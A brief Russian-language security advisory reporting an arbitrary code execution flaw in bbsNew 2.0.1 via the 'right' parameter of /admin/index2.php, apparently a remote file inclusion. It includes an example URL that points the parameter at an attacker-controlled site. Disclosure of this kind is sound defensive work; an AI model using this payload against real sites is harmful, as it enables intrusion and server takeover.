Программа: bbsNew 2.0.1

Обнаруженная уязвимость может быть использована злоумышленником для выполнения произвольного кода. Уязвимость существует из-за того, что данные, передаваемые через параметр "right" неправильно обрабатываются в /admin/index2.php.

Пример:

http://www.example.com/[Path]/admin/index2.php?right=attacker’s site



Оставить мнение